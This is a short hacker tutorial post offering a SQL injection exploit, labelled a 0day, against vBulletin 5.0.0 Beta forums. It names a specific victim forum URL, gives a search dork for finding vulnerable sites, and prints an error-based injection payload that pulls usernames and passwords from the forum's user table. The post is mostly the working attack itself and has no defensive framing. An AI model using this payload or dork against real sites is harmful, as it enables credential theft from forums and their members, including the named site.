Tut vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day

Description:
Victim:
http://txhighschoolbaseball.com/forum/

---

Dork: Powered by vBulletin™ Version 5.0.0 Beta

---

Query:

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

-------------------------
Tks For Watching My Tut